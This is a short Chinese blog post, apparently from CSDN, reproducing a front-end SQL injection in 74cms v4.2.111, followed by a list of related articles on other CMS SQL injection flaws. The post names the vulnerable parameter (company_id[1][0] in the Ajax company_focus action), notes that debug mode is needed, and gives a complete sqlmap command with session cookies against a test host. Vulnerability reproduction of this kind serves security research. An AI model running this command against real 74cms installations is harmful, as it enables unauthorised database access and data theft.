74cms前台sql注入

最新推荐文章于 2024-05-25 22:00:00 发布
最新推荐文章于 2024-05-25 22:00:00 发布
阅读量2.6k 收藏 3
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/87183417
版权

参考:
https://xz.aliyun.com/t/3715
复现了一个,其他的再说吧。
需要打开调试模式:
在index.php中

define('APP_DEBUG', true);

否则不会出现报错:
在这里插入图片描述
用sqlmap跑出来了。

sqlmap.py -u "http://cqq.com/74cms_v4.2.111/index.php?m=&c=Ajax
Personal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa" --level=5
 --risk=3 -p "company_id[1][0]" -H "Cookie: PHPSESSID=rscvvagb136g3a89s1fehg4b70
; HdeyfydKGycookietime=0; think_template=default; callback_type=login; think_lan
guage=zh-CN"

在这里插入图片描述

caiqiiqi
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1378
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
【某CMS漏洞】SQL注入漏洞分析
最新发布
qingkahui24689的博客
05-25 916
本文直接从一个入口的注入点展开,想找到一条合适的链路到GetShell的完整过程,但是遗憾的是,没能解决6位随机后台地址的问题,故实际利用起来的话,局限性还是有的,姑且称之为一次分享式的尝试性代码审计体验录吧。黑客&网络安全如何学习。
审计一套CMS中的SQL注入
weixin_30790841的博客
08-07 321
漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞。 漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量...
[复现]蝉知cms 5.6 前台注入
weixin_30699741的博客
08-11 510
https://share.weiyun.com/5cbff06337d32a9748d0f1bead5ddbd5 前台注入 在/chanzhieps/system/module/cart/control.php页面的add函数 public function add($product, $count) { if($this->app->user-...
74cms3.0 SQL注入
Z_l123的博客
03-08 419
登录后进入个人资料 填写后,保存并抓包 将抓到的包按如下修改,关闭抓包 结果 md5验证
(php)某cms的一次sql注入审计
叶子的Blog
12-02 2134
搭建源码(3.9)​​​​​​​ 环境 路径:\Include\web_inc.php 通过$_SERVER["REQUEST_URI"]获取$web_urls 然后用 / 分割 再将第二个和第三个参数传入到web_language_ml函数中 下面我们跟踪一下web_language_ml函数(位置Include\contorl.php) 可以看到红色箭头部分对我们传入的参数和sql语句进行了拼接操作 利用思路 首先我们找到这个cms对于sql注入的过滤函数 位于Inclu
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
本文档将详细介绍极致CMS(以下简称JIZHICMS)的安全审计报告,涵盖SQL注入、储存行XSS和逻辑漏洞等多方面的安全问题。本文档将从标题和描述开始,逐步解释标签和部分内容中的知识点。 极致CMS审计报告概述 极致...
骑士5.0.1 CMS +前台存在SQL注入
04-25
由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的...
510cms建站系统可用于复现前台sql注入
02-09
总结来说,510CMS建站系统的前台SQL注入问题表明了在开发过程中安全意识的重要性。为了保护用户的隐私和系统的稳定性,所有Web应用程序都应采取适当措施来防止SQL注入,确保输入数据的安全处理。对于已经使用510CMS...
74cms 4.2.3模板
07-08
74cms4.2.3模板,大家测试用,如果其他需要,可以更贴留言,共同讨论研究
[代码审计] 中环CMS v2.0 的SQL注入漏洞分析
shawdow_bug的博客
07-09 1219
一个CMS的SQL盲注分析
织梦Dedecms buy_action.php SQL注入漏洞分析
深秋哋黎明的专栏
11-20 5627
Dedecms buy_action.php SQL注入漏洞分析 0x01 补丁对比 通过对比源码和2月25日补丁发现被改动的文件有三个,buy_action.php、uploadsafe.inc.php和sys_info.htm。 sys_info.htm只是添加了一个重置cfg_cookie_encode的代码,而且是静态文件,可以忽略掉。uploadsafe.inc.php
php sql json防注入,sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery))
weixin_36268390的博客
03-13 276
sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery))0x1网上搜下没有关于ajax的sql注入文章,这里简单写一下抛砖引玉。原理自己百度,这里简单说下:通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。0x2我这里用一个漏洞示例程序bWAPP来演示,先看下正常访问的情况:输...
底层用python、前台用什么_python写前台
weixin_39551611的博客
11-26 289
广告关闭腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元!最近有个74cms v4. 2.3任意文件下载的漏洞, 本来想试着和74cms 3.6 前台sql注入漏洞结合下然后取出qs_pwdhash的值进行md5碰撞,可惜了任意文件下载的漏洞并不影响74cms 3.6,所以就只能先复现下前台注入漏洞了。 本次实验任务1. 复现74cms 3...
phpcms前台注入导致任意文件读取漏洞
草巾冒小子的博客
06-12 6381
关于:phpcms前台注入导致任意文件读取漏洞 的修复问题 阿里云服务器提示漏洞问题。
74CMS的RCE挖掘思路
include_voidmain的博客
04-06 2720
0x01 前言 在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~ 实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章中DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包中的referer并没有进行过滤,并且将referer中的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include
74cms
记录笔记
04-11 485
将这个74cms的upload目录设置为网站根目录,使用目录扫描工具进行扫描,然后使用burpsuite对后台地址用户名和密码进行爆破。 外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vz7TMzdB-1649678567118)(![https://img-blog.csdnimg.cn/fa8e0f36afe149218e3c1549728fe6f1.png)] 爆出来用户名admin 密码root ...
joomla cms 3.2-3.44 前台sql注入结果分析
06-08
对于 Joomla CMS 3.2-3.4.4 的前台 SQL 注入漏洞,攻击者可以通过构造恶意的 SQL 语句来绕过应用程序的身份验证和访问控制,从而获取敏感信息或者修改、删除、添加数据。 攻击者可以利用 SQL 注入漏洞执行各种恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值